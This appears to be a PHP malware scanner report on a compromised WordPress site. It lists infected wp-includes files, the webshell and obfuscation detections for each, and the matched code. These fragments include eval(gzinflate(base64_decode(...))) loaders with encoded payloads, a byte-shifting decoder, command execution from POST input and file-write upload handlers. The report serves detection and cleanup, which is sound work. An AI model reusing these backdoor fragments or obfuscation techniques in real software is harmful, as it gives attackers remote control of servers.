Exploit nano Line: 231 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[28]($_GET['item'])`
Exploit nano Line: 241 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i])`
Exploit nano Line: 245 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Upload File Successfully! ", "Success", "success", "?dir=$path")`
Exploit nano Line: 247 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Upload Failed", "Failed", "error", "?dir=$path")`
Exploit nano Line: 252 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path")`
Exploit nano Line: 259 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[18]($path)`
Exploit nano Line: 277 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[0]()`
Exploit nano Line: 279 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[19]($_SERVER['SERVER_NAME'])`
Exploit nano Line: 331 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[20]($_POST['command'])`
Exploit nano Line: 349 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[9]($func[5]($path. '/'. $_GET['item'])`
Exploit nano Line: 366 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[11]($func[10]('%o', $func[6]($_GET['item'])`
Exploit nano Line: 400 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[25]('mysql_connect')`
Exploit nano Line: 430 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[22]($path)`
Exploit nano Line: 437 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[8]($dir)`
Exploit nano Line: 439 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[35]($dir)`
Exploit nano Line: 440 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[11]($func[10]('%o', $func[6]($dir)`
Exploit nano Line: 441 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[23]("Y-m-d h:i:s", $func[7]($dir)`
Exploit nano Line: 467 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[24]($dir)`
Exploit nano Line: 468 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[26]($dir)`
Exploit nano Line: 88 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[1]()`
Exploit nano Line: 89 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[2](0)`
Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[31](0)`
Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[32]()`
Exploit nano Line: 92 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[33]('error_log', null)`
Exploit nano Line: 93 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[33]('log_errors', 0)`
Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[33]('max_execution_time', 0)`
Exploit nano Line: 95 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[33]('output_buffering', 0)`
Exploit nano Line: 96 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[33]('display_errors', 0)`
Exploit nano Line: 99 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[34]("disable_functions")`
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	<?php posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } if (isset($_POST['newFolderName'])) { if ($func[29]($path . '/' . $_POST['newFolderName'])) { $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create Folder Failed", "Failed",...
Sign 5b557546 Line: 65 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/media/index.php

Size: 76.62 kB Created: 2022-07-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 8

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xguSAEPeJHShBCkZzcykBesqf357vYG/...
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(gzinflate(base64_decode('TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xgu...
Exploit hex_char Line: 39 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5F`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
Sign 237750ea Line: 39 Dangerous Malware Signature (hash: 237750ea)	`<?php \x65\x76\x61\x6C`
Sign 58cb6644 Dangerous Malware Signature (hash: 58cb6644)	<?php <?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PH...
Sign 7830f7a6 Line: 39 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0Yx`
Sign 8000b2f1 Line: 38 Dangerous Malware Signature (hash: 8000b2f1)	`<?php <?php eval("\x65`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/paste/item.php

Size: 8.47 kB Created: 2022-05-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Line: 75 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp,$_POST['src'])`
Sign 2b3f81c9 Line: 46 Dangerous Malware Signature (hash: 2b3f81c9)	`<?php 0byt3m1n1`
Sign d97f004d Line: 111 Dangerous Malware Signature (hash: d97f004d)	`<?php ZeroByte`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/textcolor/function.php

Size: 3.06 kB Created: 2021-11-11 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 7

Description	Match
Exploit hex_char Line: 50 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5F`
Exploit nano Line: 56 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $arr[9]($arr[10])`
Exploit nano Line: 65 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $arr[9]($arr[2])`
Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $arr[9]($arr[11])`
Exploit nano Line: 67 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $arr[9]($arr[5])`
Exploit nano Line: 68 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $arr[9]($arr[6])`
Sign 43b0d90f Dangerous Malware Signature (hash: 43b0d90f)	`<?php edoced_46esab`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpeditimage/index.php

Size: 72.53 kB Created: 2022-03-16 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 4 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'f/v9t7/z/f9/zGtJW3Sy/PfW4KgqkB11x3myNiRGe7x4w/EtYkJNJQMKOlgTdFQryrgusfC8OZkkzuDffQ2+AnOkSBiDCCiAde9GBKAN3vsEg5NugWRYQXt/gEHJ2wA60UXGnC8Ei/kB4REh+lHBryi07GUDnRAX78YFkh2BetVVg78GmBjp+Ad2yxCRPQDee2BLHeh5JLRWVZrHG/Q7botAFRfKqvinBJnxexAfIefcdgHVqUVRSjoXSC4gAn2ngkMMgWTXlGwUWRAaewDn2V0cJVLwaKe5SKjn55x0kuNHFAXiv8trm/scOiCY6UebYcNaISA/DgcNIRUftHwqCh7G2g9J1hVYCCYAc9suDtIqUNrGeChEeAWS+i+O8nBCbOqObOmBQTOq7OFxICaZxBxHPllBJjBQfMmUg0+cP6KovwJIXfIIFIB4EVUj94FgBwFoBwB5girB3VowJo16sk8fIninFrJtTiqcB4apV3SNMUmaqmF...
Exploit concat Line: 38 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $O3248.$O5413.$O6248.$O5759.$O2730.$O8535.$O7859.$O9687.$O5759.$O7691.`
Exploit concat_vars_with_spaces Line: 38 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code	`<?php $O7859.$O9687.$O5759.$O7691.$O1505.$O9687.`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($O1271($O2203($O9644('f/v9t7/z/f9/zGtJW3Sy/PfW4KgqkB11x3myNiRGe7x4w/EtYkJNJQMKOlgTdFQryrgusfC8OZkkzuDffQ2+AnOkSBiDCCiAde9GBKAN3vsEg5NugWRYQXt/gEHJ2wA60UXGnC8Ei/kB4REh+lHBryi07GUDnRAX78YFkh2BetVVg78GmBjp+Ad2yxCRPQDee2BLHeh5JLRWVZrHG/Q7botAFRfKqvinBJnxexAfIefcdgHVqUVRSjoXSC4gAn2ngkMMgWTXlGwUWRAaewDn2V0cJVLwaKe5SKjn55x0kuNHFAXiv8trm/scOiCY6UebYcNaISA/DgcNIRUftHwqCh7G2g9J1hVYCCYAc9suDtIqUNrGeChEeAWS+i+O8nBCbOqObOmBQTOq7OFxICaZxBxHPllBJjBQfMmUg0+cP6KovwJIXfIIFIB4EVUj94FgBwFoBwB5girB3VowJo16sk8fI...
Function str_rot13 exec_str_rot13 Line: 38 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php rKRp`
Sign 84abfe10 Line: 38 Dangerous Malware Signature (hash: 84abfe10)	`<?php $O3248.$O5413.$O6248.$O5759.$O2730.$O8535.$O7859.$O9687.$O5759.$O7691.$O1505.$O9687.`
Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454)	`<?php VJAG`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpemoji/index.php

Size: 25.82 kB Created: 2022-06-16 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpgallery/function.php

Size: 31.56 kB Created: 2022-01-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 9 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php "5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxCR3BCvfdIHB...

Function eval Line: 9 Warning

Potentially dangerous function `eval`

<?php eval(Ccll("5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxC...

Sign e996cf12 Line: 3 Dangerous

Malware Signature (hash: e996cf12)

<?php $DEV=gzinflate(base64_decode($DEV));
 for($i=0;$i<strlen($DEV);$i++)
 {
$DEV[$i] = chr(ord($DEV[$i])-1);
 }
 return $DEV;
 }eval(Ccll(

/custdata02/turtle/public_html/wp-includes/js/tinymce/themes/inlite/index.php

Size: 14.30 kB Created: 2022-02-18 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 13

Description	Match
Exploit nano Line: 108 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[9]("{$Jd}/{$F1}")`
Exploit nano Line: 39 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[6]($yf)`
Exploit nano Line: 57 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[1]()`
Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[17](JD($_GET["n"])`
Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[4]("/(\\\\\|\\/)`
Exploit nano Line: 77 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]($BL)`
Exploit nano Line: 81 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]("{$Jd}/{$_POST["n"]}")`
Exploit nano Line: 84 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])`
Exploit nano Line: 87 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[16]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"])`
Sign 5470607c Line: 63 Dangerous Malware Signature (hash: 5470607c)	`<?php ]} ({$_SERVER[`

/custdata02/turtle/public_html/wp-includes/install.php

Size: 14.37 kB Created: 2021-12-01 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 3

Description	Match
Exploit align Line: 1 Warning Code alignment technique is usually used for the obfuscation of malicious code	`<?php ;$l1JVj4DD=$l14DhMR($l1k)`
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "b66b6bb9bb66bb669b6b69bbbb6b69b666b6bb9b66666bb69b6bb9bbbbbb9bbb666b9bb6b669b6b6bbb9bbbb66bb69b69bb6bb69b6b6b66669b66bbb6bb9bbbbb6b9bbb6b69b66669b666b66b9b66bb6b69bbb6b66669b66b9bb66b69b6bb6bbbb9bbbbb69bbbb666b9bbbb6bbb9b666b69bbb6bb9bbbbbb669bbb669b66bbb6b9bb6bb666b9bbb6b66b9bb6b666b69bb66b6b9bbb6b6b669bb6bbbb9b6bb6b9b66666b9b666bb6669b6b66b6b69b666bbbbb9b6b6bbb669bb6b66b9bbbb6b6b9b66b6669b66666bb9bbbb66b69b6b6bbb69bbbb6b9b6666bb69b6bb66bbb9b6b6b6b"`
Exploit reversed Line: 1 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions	`<?php ecalper_rts`
Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php cexe`
Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f)	`<?php edoced_46esab`

/custdata02/turtle/public_html/wp-includes/index.php

Size: 6.97 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/public_html/wp-includes/sodium_compat/src/Core/Poly1305/index.php

Size: 59.83 kB Created: 2022-04-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 4 Dangers: 1

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22n+DTkGtMZ8Bv3zx+/5QYwbaK6Tpv6/eJAfAfg6gkIDpPwV6bgYMOi8M31Zsd4JHnx36OyQUP9G5xb6zb380ch+Y/WjsV7ycEkAFGzp6sFIAwEgLIbCe6gk8BMGmLcHOKMGmSqBELt9YNarV/c99F6EEk/MDbCrWG4BUV4Z5QEF/mCTjNe8DusDSK+1UwOAC/QN2/5c8TwCbpmgNe3s/acCgCqH8wQJIJdJ4KXq72AJys71B3v4lToP97/BWDiSZ2t/R+vA0AZALAM2gk2VVSgodVA/gvkG1v34VVREi0kkAfrqq1QSOoaV5XqqmpbW7WUQBS9gSUH3z4MHu0oL89NG9oR0iHqUYWCE/MBifeorxPrenBj0/e/isXhT6UKwCYAQ6UQAUiwPwAKuVcoGQGAN7vL7eNdiBLtW+3...
Exploit concat Line: 38 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.`
Exploit concat_vars_with_spaces Line: 38 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code	`<?php $O9705.$O2275.$O4387.$O0763.$O8797.$O2275.`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($O3361($O6447($O7244('B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22n+DTkGtMZ8Bv3zx+/5QYwbaK6Tpv6/eJAfAfg6gkIDpPwV6bgYMOi8M31Zsd4JHnx36OyQUP9G5xb6zb380ch+Y/WjsV7ycEkAFGzp6sFIAwEgLIbCe6gk8BMGmLcHOKMGmSqBELt9YNarV/c99F6EEk/MDbCrWG4BUV4Z5QEF/mCTjNe8DusDSK+1UwOAC/QN2/5c8TwCbpmgNe3s/acCgCqH8wQJIJdJ4KXq72AJys71B3v4lToP97/BWDiSZ2t/R+vA0AZALAM2gk2VVSgodVA/gvkG1v34VVREi0kkAfrqq1QSOoaV5XqqmpbW7WUQBS9gSUH3z4MHu0oL89NG9oR0iHqUYWCE/MBifeorxPrenBj0/e/isXhT6UKwCYAQ6UQAUiwP...
Sign 84abfe10 Line: 38 Dangerous Malware Signature (hash: 84abfe10)	`<?php $O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.$O8797.$O2275.`

/custdata02/turtle/public_html/wp-includes/themes.php

Size: 19.76 kB Created: 2024-02-29 05:56:20 Modified: 2024-06-01 08:12:25 Warns: 3 Dangers: 16

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtweGIyZ3FMMEJ6WlhOemF...
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHAgaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOyAvKilPY0AqViFyVzVHakk3Ki9Ac2V0X3RpbWVfbGltaXQvKktoclVUTG5KdyhQKEQ4dUAqLygwKTsNCi8qR3E1NEBHWEJDNnIhOTRqRUoqL0BlcnJvcl9yZXBvcnRpbmcvKnluNEZ5dkpkSGE2aUg9NTdTZSovKDApOw0KLyppQ01OaEJtVUk1QzYwOGlIKi9AaWdub3JlX3VzZXJfYWJvcnQvKktGbTJGMU5uVyQ4UERJKi8oMSk7DQovKiNTOUhMTkpxb2gqL0BzZXNzaW9uX3N0YXJ0LyomTyY0K29VNVdGbFQqLygpOw0KLyo1cENMdUZCZUp2YVNqKi9pbmlfc2V0LyphdVJhQHQ3TEFmNEE9YmFTMiovKCdkaXNwbGF5X2Vycm9ycycsICdPZmYnKTsNCmlmICgvKipCNm5...
